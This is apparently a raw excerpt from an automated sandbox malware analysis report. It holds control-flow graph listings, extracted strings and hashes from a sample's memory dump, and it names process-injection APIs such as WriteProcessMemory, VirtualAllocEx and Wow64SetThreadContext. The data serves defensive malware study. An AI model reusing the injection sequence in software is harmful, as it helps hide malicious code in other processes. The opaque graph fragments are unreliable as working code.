WriteProcessMemory 11068->11069 11071 a6956b 11069->11071 11071->10998 11073 a6962c ReadProcessMemory 11072->11073 11075 a696aa 11073->11075 11075->11007 11077 a695e0 ReadProcessMemory 11076->11077 11079 a696aa 11077->11079 11079->11007 11081 a69228 Wow64SetThreadContext 11080->11081 11083 a692ef 11081->11083 11083->11028 11085 a69271 Wow64SetThreadContext 11084->11085 11087 a692ef 11085->11087 11087->11028 11089 a69358 VirtualAllocEx 11088->11089 11091 a6941a 11089->11091 11091->11035 11093 a6939c VirtualAllocEx 11092->11093 11095 a6941a 11093->11095 11095->11035

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 645 219ca8-219ccb 646 219cd2-219d2c call 210e64 645->646 647 219ccd 645->647 651 219d2f 646->651 647->646 652 219d36-219d52 651->652 653 219d54 652->653 654 219d5b-219d5c 652->654 653->651 653->654 655 219d61-219d7c 653->655 656 219da0-219db5 653->656 657 219ec3-219f33 call 210ed4 653->657 658 219e62-219ea2 653->658 659 219ea7-219ebe 653->659 660 219dea-219df7 653->660 661 219dba-219dbe 653->661 662 219e1d-219e5d 653->662 663 219d7e-219d9e 653->663 654->657 655->652 656->652 679 219f3b-219f45 657->679 658->652 659->652 674 219e00-219e18 660->674 664 219dd1-219dd8 661->664 665 219dc0-219dcf 661->665 662->652 663->652 666 219ddf-219de5 664->666 665->666 666->652 674->652
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :dJ$Tep$Tep
                                      • API String ID: 0-366135230
                                      • Opcode ID: 54ddac80e5de4b048137af5de9a1620cc77a462f8f0461135b3988c4a83b78e0
                                      • Instruction ID: e94899f0756d644e403da99a4b66512fd0677e747ad025d05ae6f6b87a109689
                                      • Opcode Fuzzy Hash: 54ddac80e5de4b048137af5de9a1620cc77a462f8f0461135b3988c4a83b78e0
                                      • Instruction Fuzzy Hash: F181E5B4E102088FDB08DFAAD9906DEFBF2FF89300F24942AD415AB254D7749945CF64

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 763 21c1c8-21c1ed 764 21c1f4-21c23a 763->764 765 21c1ef 763->765 768 21c23d 764->768 765->764 769 21c244-21c260 768->769 770 21c262 769->770 771 21c269-21c26a 769->771 770->768 770->771 772 21c5a1-21c5a8 770->772 773 21c420-21c424 770->773 774 21c320-21c326 770->774 775 21c345-21c34e 770->775 776 21c4e6-21c4f2 770->776 777 21c306-21c31b 770->777 778 21c469-21c475 770->778 779 21c4ca-21c4e1 770->779 780 21c2aa-21c2bc 770->780 781 21c3aa-21c3b6 770->781 782 21c26f-21c294 770->782 783 21c2ef-21c301 770->783 784 21c450-21c464 770->784 785 21c3f0-21c3f4 770->785 786 21c493-21c49f 770->786 787 21c574-21c580 770->787 788 21c296-21c2a8 770->788 789 21c37a-21c37e 770->789 790 21c3de-21c3eb 770->790 791 21c2be-21c2ea 770->791 771->772 806 21c437-21c43e 773->806 807 21c426-21c435 773->807 810 21c32e-21c340 774->810 796 21c361-21c368 775->796 797 21c350-21c35f 775->797 800 21c4f4 776->800 801 21c4f9-21c50f 776->801 777->769 808 21c477 778->808 809 21c47c-21c48e 778->809 779->769 780->769 802 21c3b8 781->802 803 21c3bd-21c3d9 781->803 782->769 783->769 784->769 804 21c407-21c40e 785->804 805 21c3f6-21c405 785->805 794 21c4a1 786->794 795 21c4a6-21c4c5 786->795 792 21c582 787->792 793 21c587-21c59c 787->793 788->769 798 21c391-21c398 789->798 799 21c380-21c38f 789->799 790->769 791->769 792->793 793->769 794->795 795->769 811 21c36f-21c375 796->811 797->811 812 21c39f-21c3a5 798->812 799->812 800->801 823 21c511 801->823 824 21c516-21c52c 801->824 802->803 803->769 813 21c415-21c41b 804->813 805->813 815 21c445-21c44b 806->815 807->815 808->809 809->769 810->769 811->769 812->769 813->769 815->769 823->824 826 21c533-21c549 824->826 827 21c52e 824->827 829 21c550-21c56f 826->829 830 21c54b 826->830 827->826 829->769 830->829
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0%p1$0%p1
                                      • API String ID: 0-3740086479
                                      • Opcode ID: ecf4a6357148ee3a2207e68feb485c75309e1654f644fab8f50eb7aa0e0d3ebb
                                      • Instruction ID: b24d0ea9e945611727785e310da47089b79f4e07a50f0a905c4d428dad48111d
                                      • Opcode Fuzzy Hash: ecf4a6357148ee3a2207e68feb485c75309e1654f644fab8f50eb7aa0e0d3ebb
                                      • Instruction Fuzzy Hash: 59C13A74E5420ADFCB08CF99C4808EEFBB2FF99340B249559D415A7214D734AA92CF94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Z
                                      • API String ID: 0-1862792848
                                      • Opcode ID: 5638ee15189bb84f152fb66871d12da2af47ac99e6e408b473a09c7956337901
                                      • Instruction ID: 79ad03653ef44010f3d48b166f638290eccb65d5a96472ab1259d7e6a39fcc8c
                                      • Opcode Fuzzy Hash: 5638ee15189bb84f152fb66871d12da2af47ac99e6e408b473a09c7956337901
                                      • Instruction Fuzzy Hash: 84913374E20219DFCB44DFA9C9808EEFBB2FF98300F10986AD425B7218D3749A568F54
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19f9e90ff389e4678e99c11d876598db4dde1ff3c53d31c7be8e5724c70510f8
                                      • Instruction ID: 54fe2f07fb52ba1a7baca6ad3bc1bc336028b5dab0182602e403f8f5b2ba4336
                                      • Opcode Fuzzy Hash: 19f9e90ff389e4678e99c11d876598db4dde1ff3c53d31c7be8e5724c70510f8
                                      • Instruction Fuzzy Hash: ED411270E10508EFCB48DF9AD88489DFBF1FF99300B26C0E6D8589B224D731AA558B00

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 2129fc-2129fe 1 212a70-212a74 0->1 2 212a00-212a46 0->2 3 212a75 call 212b76 1->3 18 212a52-212a5c 2->18 19 212a48 2->19 4 212a7a-212a7f 3->4 6 212a86 4->6 7 212a94 6->7 9 212adb-212adf 7->9 10 212ae1-212aea 9->10 11 212b02 9->11 13 212af1-212afe 10->13 14 212aec-212aef 10->14 15 212b05 11->15 16 212b00 13->16 14->16 21 212b0b 15->21 16->15 23 212a81 18->23 24 212a5e-212a6a 18->24 22 212a4d 19->22 26 212b13-212b16 21->26 25 21299a-21299d 22->25 23->6 24->22 29 2129a6-2129bd 25->29 30 21299f 25->30 27 212b28-212b37 26->27 28 212b18 26->28 58 212b39-212b3f 27->58 59 212b4f-212b5b 27->59 28->27 31 212e13-212e27 28->31 32 212d02-212d0a 28->32 33 212d65-212da1 28->33 34 212b86-212b8a 28->34 35 212dd6-212e00 28->35 36 212d49-212d50 28->36 37 212e2a-212e33 28->37 38 212c3d-212c41 28->38 39 212c8c-212c9f 28->39 40 212d0f-212d22 28->40 29->25 30->7 30->9 30->21 30->29 30->32 30->34 30->39 30->40 41 2129f9-2129fb 30->41 42 212a6c 30->42 43 2129bf-2129f1 30->43 32->26 101 212da3-212da9 33->101 102 212db9-212dc3 33->102 50 212bad 34->50 51 212b8c-212b95 34->51 106 212e02 35->106 107 212e0c-212e11 35->107 45 212e36 36->45 46 212d56-212d60 36->46 47 212c43-212c4c 38->47 48 212c64 38->48 39->45 69 212ca5-212cba 39->69 75 212d45-212d47 40->75 76 212d24-212d2e 40->76 41->0 42->1 43->41 45->45 46->26 54 212c53-212c60 47->54 55 212c4e-212c51 47->55 61 212c67-212c87 48->61 56 212bb0-212bb4 50->56 62 212b97-212b9a 51->62 63 212b9c-212ba9 51->63 68 212c62 54->68 55->68 73 212bd7 56->73 74 212bb6-212bbf 56->74 70 212b41 58->70 71 212b43-212b45 58->71 83 212b66-212b74 59->83 61->26 72 212bab 62->72 63->72 68->61 95 212cd8 69->95 96 212cbc-212cc2 69->96 70->59 71->59 72->56 81 212bda-212bde 73->81 85 212bc1-212bc4 74->85 86 212bc6-212bd3 74->86 75->36 87 212d40 75->87 76->45 77 212d34-212d3b 76->77 77->87 90 212be0-212be9 81->90 91 212bff 81->91 83->34 89 212bd5 85->89 86->89 87->26 89->81 98 212bf0-212bf3 90->98 99 212beb-212bee 90->99 94 212c02-212c26 91->94 94->45 120 212c2c-212c38 94->120 108 212cda-212cdc 95->108 104 212cc4-212cc6 96->104 105 212cc8-212cd4 96->105 103 212bfd 98->103 99->103 109 212dab 101->109 110 212dad-212daf 101->110 102->45 111 212dc5-212dd1 102->111 103->94 112 212cd6 104->112 105->112 115 212e07 106->115 107->31 107->115 113 212cea-212cfd 108->113 114 212cde-212ce4 108->114 109->102 110->102 111->26 112->108 113->26 118 212ce6 114->118 119 212ce8 114->119 115->26 118->113 119->113 120->26
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$XXp$XXp$XXp$XXp$XXp$$p$$p$$p$$p
                                      • API String ID: 0-748399701
                                      • Opcode ID: 1466a26a133ce4a83943ebd348495deee333a0a4df6d85efcf9a668b3371a208
                                      • Instruction ID: e7a7f6c8c13ac0720256c9a4cd65a0db0c00a3285f8953a8b400d2c6665e65dd
                                      • Opcode Fuzzy Hash: 1466a26a133ce4a83943ebd348495deee333a0a4df6d85efcf9a668b3371a208
                                      • Instruction Fuzzy Hash: EAA19030A24248CFDB148F98D445BEDBBF2BFA4305F258056F5029B295CBB09DE9DB81

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 122 212b76-212b84 124 212b13-212b16 122->124 125 212b86-212b8a 122->125 128 212b28-212b37 124->128 129 212b18 124->129 126 212bad 125->126 127 212b8c-212b95 125->127 132 212bb0-212bb4 126->132 130 212b97-212b9a 127->130 131 212b9c-212ba9 127->131 156 212b39-212b3f 128->156 157 212b4f-212b5b 128->157 129->125 129->128 133 212e13-212e27 129->133 134 212d02-212d0a 129->134 135 212d65-212da1 129->135 136 212dd6-212e00 129->136 137 212d49-212d50 129->137 138 212e2a-212e33 129->138 139 212c3d-212c41 129->139 140 212c8c-212c9f 129->140 141 212d0f-212d22 129->141 148 212bab 130->148 131->148 149 212bd7 132->149 150 212bb6-212bbf 132->150 134->124 193 212da3-212da9 135->193 194 212db9-212dc3 135->194 197 212e02 136->197 198 212e0c-212e11 136->198 142 212e36 137->142 143 212d56-212d60 137->143 144 212c43-212c4c 139->144 145 212c64 139->145 140->142 166 212ca5-212cba 140->166 172 212d45-212d47 141->172 173 212d24-212d2e 141->173 142->142 143->124 152 212c53-212c60 144->152 153 212c4e-212c51 144->153 159 212c67-212c87 145->159 148->132 154 212bda-212bde 149->154 160 212bc1-212bc4 150->160 161 212bc6-212bd3 150->161 165 212c62 152->165 153->165 170 212be0-212be9 154->170 171 212bff 154->171 167 212b41 156->167 168 212b43-212b45 156->168 180 212b66-212b74 157->180 159->124 169 212bd5 160->169 161->169 165->159 189 212cd8 166->189 190 212cbc-212cc2 166->190 167->157 168->157 169->154 183 212bf0-212bf3 170->183 184 212beb-212bee 170->184 178 212c02-212c26 171->178 172->137 182 212d40 172->182 173->142 174 212d34-212d3b 173->174 174->182 178->142 200 212c2c-212c38 178->200 180->125 182->124 186 212bfd 183->186 184->186 186->178 199 212cda-212cdc 189->199 195 212cc4-212cc6 190->195 196 212cc8-212cd4 190->196 201 212dab 193->201 202 212dad-212daf 193->202 194->142 203 212dc5-212dd1 194->203 204 212cd6 195->204 196->204 207 212e07 197->207 198->133 198->207 205 212cea-212cfd 199->205 206 212cde-212ce4 199->206 200->124 201->194 202->194 203->124 204->199 205->124 209 212ce6 206->209 210 212ce8 206->210 207->124 209->205 210->205
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$Tep$XXp$$p$$p$$p$$p$$p$$p
                                      • API String ID: 0-1748866375
                                      • Opcode ID: ef52bb34313903da3aba851e5a0e1e0d71aa73993926be28e4b9e3acf387e0bd
                                      • Instruction ID: 838102aa41aa136555fe226726503c44798f10ebac9deccf0f66e5efbf8ccc94
                                      • Opcode Fuzzy Hash: ef52bb34313903da3aba851e5a0e1e0d71aa73993926be28e4b9e3acf387e0bd
                                      • Instruction Fuzzy Hash: 65918F30A24258CFCB188F58D445BEDBBF2BFA0304F698056F4029B295DB70DDA6DB80

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 212 212b27 213 212b28-212b37 212->213 215 212b39-212b3f 213->215 216 212b4f-212b5b 213->216 217 212b41 215->217 218 212b43-212b45 215->218 219 212b66-212b74 216->219 217->216 218->216 220 212b86-212b8a 219->220 221 212bad 220->221 222 212b8c-212b95 220->222 225 212bb0-212bb4 221->225 223 212b97-212b9a 222->223 224 212b9c-212ba9 222->224 226 212bab 223->226 224->226 228 212bd7 225->228 229 212bb6-212bbf 225->229 226->225 232 212bda-212bde 228->232 230 212bc1-212bc4 229->230 231 212bc6-212bd3 229->231 233 212bd5 230->233 231->233 234 212be0-212be9 232->234 235 212bff 232->235 233->232 238 212bf0-212bf3 234->238 239 212beb-212bee 234->239 236 212c02-212c26 235->236 243 212e36 236->243 244 212c2c-212c38 236->244 241 212bfd 238->241 239->241 241->236 243->243 245 212b13-212b16 244->245 245->213 246 212b18 245->246 246->213 246->220 247 212e13-212e27 246->247 248 212d02-212d0a 246->248 249 212d65-212da1 246->249 250 212dd6-212e00 246->250 251 212d49-212d50 246->251 252 212e2a-212e33 246->252 253 212c3d-212c41 246->253 254 212c8c-212c9f 246->254 255 212d0f-212d22 246->255 248->245 288 212da3-212da9 249->288 289 212db9-212dc3 249->289 285 212e02 250->285 286 212e0c-212e11 250->286 251->243 256 212d56-212d60 251->256 257 212c43-212c4c 253->257 258 212c64 253->258 254->243 269 212ca5-212cba 254->269 270 212d45-212d47 255->270 271 212d24-212d2e 255->271 256->245 262 212c53-212c60 257->262 263 212c4e-212c51 257->263 260 212c67-212c87 258->260 260->245 268 212c62 262->268 263->268 268->260 279 212cd8 269->279 280 212cbc-212cc2 269->280 270->251 276 212d40 270->276 271->243 272 212d34-212d3b 271->272 272->276 276->245 287 212cda-212cdc 279->287 283 212cc4-212cc6 280->283 284 212cc8-212cd4 280->284 290 212cd6 283->290 284->290 293 212e07 285->293 286->247 286->293 291 212cea-212cfd 287->291 292 212cde-212ce4 287->292 294 212dab 288->294 295 212dad-212daf 288->295 289->243 296 212dc5-212dd1 289->296 290->287 291->245 298 212ce6 292->298 299 212ce8 292->299 293->245 294->289 295->289 296->245 298->291 299->291
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                      • API String ID: 0-3004817860
                                      • Opcode ID: a04f6553eaea890c5926255be68669b378274f6f9119a2888518d6695107deef
                                      • Instruction ID: 8aa998dbf490371f4ae451f3b18bccb3faa1563570a95cd98daccab132f05970
                                      • Opcode Fuzzy Hash: a04f6553eaea890c5926255be68669b378274f6f9119a2888518d6695107deef
                                      • Instruction Fuzzy Hash: 8071A230A28218CFCB248F54D445BEDBBF2BBA0305F698156F5025B295DBB09DF9DB81

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 301 212b0e 302 212b13-212b16 301->302 303 212b28-212b37 302->303 304 212b18 302->304 333 212b39-212b3f 303->333 334 212b4f-212b5b 303->334 304->303 305 212e13-212e27 304->305 306 212d02-212d0a 304->306 307 212d65-212da1 304->307 308 212b86-212b8a 304->308 309 212dd6-212e00 304->309 310 212d49-212d50 304->310 311 212e2a-212e33 304->311 312 212c3d-212c41 304->312 313 212c8c-212c9f 304->313 314 212d0f-212d22 304->314 306->302 369 212da3-212da9 307->369 370 212db9-212dc3 307->370 317 212bad 308->317 318 212b8c-212b95 308->318 374 212e02 309->374 375 212e0c-212e11 309->375 315 212e36 310->315 316 212d56-212d60 310->316 319 212c43-212c4c 312->319 320 212c64 312->320 313->315 338 212ca5-212cba 313->338 344 212d45-212d47 314->344 345 212d24-212d2e 314->345 315->315 316->302 329 212bb0-212bb4 317->329 325 212b97-212b9a 318->325 326 212b9c-212ba9 318->326 327 212c53-212c60 319->327 328 212c4e-212c51 319->328 323 212c67-212c87 320->323 323->302 341 212bab 325->341 326->341 337 212c62 327->337 328->337 342 212bd7 329->342 343 212bb6-212bbf 329->343 339 212b41 333->339 340 212b43-212b45 333->340 352 212b66-212b74 334->352 337->323 363 212cd8 338->363 364 212cbc-212cc2 338->364 339->334 340->334 341->329 349 212bda-212bde 342->349 353 212bc1-212bc4 343->353 354 212bc6-212bd3 343->354 344->310 355 212d40 344->355 345->315 346 212d34-212d3b 345->346 346->355 358 212be0-212be9 349->358 359 212bff 349->359 352->308 357 212bd5 353->357 354->357 355->302 357->349 366 212bf0-212bf3 358->366 367 212beb-212bee 358->367 362 212c02-212c26 359->362 362->315 388 212c2c-212c38 362->388 376 212cda-212cdc 363->376 372 212cc4-212cc6 364->372 373 212cc8-212cd4 364->373 371 212bfd 366->371 367->371 377 212dab 369->377 378 212dad-212daf 369->378 370->315 379 212dc5-212dd1 370->379 371->362 380 212cd6 372->380 373->380 383 212e07 374->383 375->305 375->383 381 212cea-212cfd 376->381 382 212cde-212ce4 376->382 377->370 378->370 379->302 380->376 381->302 386 212ce6 382->386 387 212ce8 382->387 383->302 386->381 387->381 388->302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                      • API String ID: 0-3004817860
                                      • Opcode ID: 749bd323d3dac9348d971236d7f3df40ab92d6d5b5b141e9338973377b3aeeac
                                      • Instruction ID: e5ad66dffe3a9c43c3b898777fe1543d61c14dd9492a8949cac9bdfd9162a755
                                      • Opcode Fuzzy Hash: 749bd323d3dac9348d971236d7f3df40ab92d6d5b5b141e9338973377b3aeeac
                                      • Instruction Fuzzy Hash: 6E719030A28218CFDB248F54D445BEDBBF2BBA0305F298156F5025B295DBB09DF9DB81

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 390 215171-2151bc 396 2151d4-215220 390->396 397 2151be-2151c4 390->397 405 215222-215228 396->405 406 215238-215247 396->406 398 2151c6 397->398 399 2151c8-2151ca 397->399 398->396 399->396 407 21522a 405->407 408 21522c-21522e 405->408 409 215161-215164 406->409 410 21524d-21524f 406->410 407->406 408->406 412 21516a 409->412 413 21535d-215390 call 210e54 409->413 410->409 411 215254 410->411 427 21525d 411->427 412->411 412->413 414 2153d0-21540a 412->414 415 2154c5-2154d2 412->415 416 215394-215410 412->416 417 2154d7-2154da 412->417 418 215517-215520 412->418 419 2154b9 412->419 420 21530a-215311 412->420 421 21543a-215453 412->421 422 21528c-2152ff 412->422 423 2153bc-2153ce 412->423 468 215371 413->468 469 215392 413->469 447 2153b0-2153b3 414->447 474 21540c 414->474 415->409 443 215412-21541b 416->443 444 21541f-215421 416->444 490 2154dd call a60d88 417->490 491 2154dd call a60d78 417->491 445 215522 418->445 419->415 426 215314 420->426 433 215455-215469 421->433 434 21546d 421->434 422->409 482 215305 422->482 423->414 439 215423-21542f 423->439 441 21531e 426->441 485 21525f call a61638 427->485 486 21525f call a61648 427->486 431 2154e3-2154f5 483 2154f7 call a60fc8 431->483 484 2154f7 call a60fb9 431->484 464 215457 433->464 465 21546b 433->465 434->419 438 215265-215271 438->409 446 215277-215287 438->446 439->447 448 215435 439->448 487 215320 call 215681 441->487 488 215320 call 215581 441->488 489 215320 call 215560 441->489 443->447 453 21541d 443->453 444->414 444->439 445->445 446->426 447->423 454 2153b5 447->454 456 2153ad 448->456 453->456 454->414 454->416 454->419 454->421 454->423 456->447 459 215326-215352 call 210e64 call 214b54 459->409 480 215358 459->480 461 2154fd-21550c 461->409 470 215512 461->470 464->434 465->464 468->416 469->468 470->418 474->456 480->480 482->420 483->461 484->461 485->438 486->438 487->459 488->459 489->459 490->431 491->431
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pT!$$p$$p$$p$$p
                                      • API String ID: 0-1890783977
                                      • Opcode ID: fa2a4361cb8e9d08f571a1c9ddc4ae0d217f8434e1f000d0dbc58d4a8609f141
                                      • Instruction ID: 9e0916bed30ff0cf898dafc782b8495a4934bd831ff3d270df44376472682a3c
                                      • Opcode Fuzzy Hash: fa2a4361cb8e9d08f571a1c9ddc4ae0d217f8434e1f000d0dbc58d4a8609f141
                                      • Instruction Fuzzy Hash: 05819234720615DFD7289F69D858BAE77E2EFE8341F2444A9E406DB3A5DEB08C91CB40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 680 215138-215159 681 21527c-215287 680->681 683 215314 681->683 684 21531e 683->684 756 215320 call 215681 684->756 757 215320 call 215581 684->757 758 215320 call 215560 684->758 685 215326-215352 call 210e64 call 214b54 691 215161-215164 685->691 692 215358 685->692 693 21516a 691->693 694 21535d-215390 call 210e54 691->694 692->692 693->694 695 2153d0-21540a 693->695 696 2154c5-2154d2 693->696 697 215254 693->697 698 215394-215410 693->698 699 2154d7-2154da 693->699 700 215517-215520 693->700 701 2154b9 693->701 702 21530a-215311 693->702 703 21543a-215453 693->703 704 21528c-2152ff 693->704 705 2153bc-2153ce 693->705 744 215371 694->744 745 215392 694->745 726 2153b0-2153b3 695->726 749 21540c 695->749 696->691 716 21525d 697->716 723 215412-21541b 698->723 724 21541f-215421 698->724 754 2154dd call a60d88 699->754 755 2154dd call a60d78 699->755 725 215522 700->725 701->696 702->683 713 215455-215469 703->713 714 21546d 703->714 704->691 753 215305 704->753 705->695 719 215423-21542f 705->719 711 2154e3-2154f5 761 2154f7 call a60fc8 711->761 762 2154f7 call a60fb9 711->762 742 215457 713->742 743 21546b 713->743 714->701 759 21525f call a61638 716->759 760 21525f call a61648 716->760 719->726 727 215435 719->727 722 215265-215271 722->691 732 215277 722->732 723->726 733 21541d 723->733 724->695 724->719 725->725 726->705 734 2153b5 726->734 735 2153ad 727->735 732->681 733->735 734->695 734->698 734->701 734->703 734->705 735->726 739 2154fd-21550c 739->691 746 215512 739->746 742->714 743->742 744->698 745->744 746->700 749->735 753->702 754->711 755->711 756->685 757->685 758->685 759->722 760->722 761->739 762->739
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$pT!
                                      • API String ID: 0-4219933926
                                      • Opcode ID: abc45506fa6dfe2ab486abed66255b9074a29feffbe3afd351332536169e35b1
                                      • Instruction ID: e76a3f4a3142bb18bbefe60aefe894310570a6d021f650b756f9f3fff7faa95a
                                      • Opcode Fuzzy Hash: abc45506fa6dfe2ab486abed66255b9074a29feffbe3afd351332536169e35b1
                                      • Instruction Fuzzy Hash: 15718E34730A14DFDB249F68D8587AE77E2ABE8341F2444A9E416C73A4CEB08C95CB41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 947 215478-215490 call 215581 951 215492 947->951 952 2154b9 947->952 953 2154a3-2154b5 951->953 954 2154c5-2154d2 952->954 957 215497-21549a 953->957 958 2154b7 953->958 959 215161-215164 954->959 957->952 960 21549c 957->960 958->952 961 215494 958->961 969 21535d-215390 call 210e54 959->969 972 21516a 959->972 960->953 960->954 962 2153d0-21540a 960->962 963 215394-215410 960->963 964 215254 960->964 965 215517-215520 960->965 966 2154d7-2154da 960->966 967 21543a-215453 960->967 968 21530a-215311 960->968 960->969 970 2153bc-2153ce 960->970 971 21528c-2152ff 960->971 961->957 994 2153b0-2153b3 962->994 1022 21540c 962->1022 990 215412-21541b 963->990 991 21541f-215421 963->991 983 21525d 964->983 993 215522 965->993 1035 2154dd call a60d88 966->1035 1036 2154dd call a60d78 966->1036 979 215455-215469 967->979 980 21546d 967->980 974 215314 968->974 1018 215371 969->1018 1019 215392 969->1019 970->962 986 215423-21542f 970->986 971->959 1030 215305 971->1030 972->952 972->954 972->962 972->963 972->964 972->965 972->966 972->967 972->968 972->969 972->970 972->971 988 21531e 974->988 977 2154e3-2154f5 1033 2154f7 call a60fc8 977->1033 1034 2154f7 call a60fb9 977->1034 1011 215457 979->1011 1012 21546b 979->1012 980->952 1031 21525f call a61638 983->1031 1032 21525f call a61648 983->1032 986->994 995 215435 986->995 1037 215320 call 215681 988->1037 1038 215320 call 215581 988->1038 1039 215320 call 215560 988->1039 990->994 999 21541d 990->999 991->962 991->986 992 215265-215271 992->959 1000 215277-215287 992->1000 993->993 994->970 1001 2153b5 994->1001 1002 2153ad 995->1002 999->1002 1000->974 1001->952 1001->962 1001->963 1001->967 1001->970 1002->994 1005 215326-215352 call 210e64 call 214b54 1005->959 1028 215358 1005->1028 1008 2154fd-21550c 1008->959 1015 215512 1008->1015 1011->980 1012->1011 1015->965 1018->963 1019->1018 1022->1002 1028->1028 1030->968 1031->992 1032->992 1033->1008 1034->1008 1035->977 1036->977 1037->1005 1038->1005 1039->1005
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pT!
                                      • API String ID: 0-2144713336
                                      • Opcode ID: c24e89d836bfde20f407065442fd994d2a8889bfcccd8ffbeb74a49a06042e7d
                                      • Instruction ID: 927f0db3bd96fd02083b55f274d3da40cc06781bbfef6e0274f990034b1edae4
                                      • Opcode Fuzzy Hash: c24e89d836bfde20f407065442fd994d2a8889bfcccd8ffbeb74a49a06042e7d
                                      • Instruction Fuzzy Hash: 73617E38B20A15DFDB249F64D8587AD77F2ABE8342F2444A9E406C73A1CAB48CD5CB41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1040 21515e 1041 215161-215164 1040->1041 1042 21516a 1041->1042 1043 21535d-215390 call 210e54 1041->1043 1042->1043 1044 2153d0-21540a 1042->1044 1045 2154c5-2154d2 1042->1045 1046 215254 1042->1046 1047 215394-215410 1042->1047 1048 2154d7-2154da 1042->1048 1049 215517-215520 1042->1049 1050 2154b9 1042->1050 1051 21530a-215311 1042->1051 1052 21543a-215453 1042->1052 1053 21528c-2152ff 1042->1053 1054 2153bc-2153ce 1042->1054 1098 215371 1043->1098 1099 215392 1043->1099 1077 2153b0-2153b3 1044->1077 1105 21540c 1044->1105 1045->1041 1066 21525d 1046->1066 1074 215412-21541b 1047->1074 1075 21541f-215421 1047->1075 1119 2154dd call a60d88 1048->1119 1120 2154dd call a60d78 1048->1120 1076 215522 1049->1076 1050->1045 1057 215314 1051->1057 1063 215455-215469 1052->1063 1064 21546d 1052->1064 1053->1041 1113 215305 1053->1113 1054->1044 1069 215423-21542f 1054->1069 1071 21531e 1057->1071 1061 2154e3-2154f5 1121 2154f7 call a60fc8 1061->1121 1122 2154f7 call a60fb9 1061->1122 1095 215457 1063->1095 1096 21546b 1063->1096 1064->1050 1117 21525f call a61638 1066->1117 1118 21525f call a61648 1066->1118 1069->1077 1078 215435 1069->1078 1114 215320 call 215681 1071->1114 1115 215320 call 215581 1071->1115 1116 215320 call 215560 1071->1116 1073 215265-215271 1073->1041 1083 215277-215287 1073->1083 1074->1077 1084 21541d 1074->1084 1075->1044 1075->1069 1076->1076 1077->1054 1085 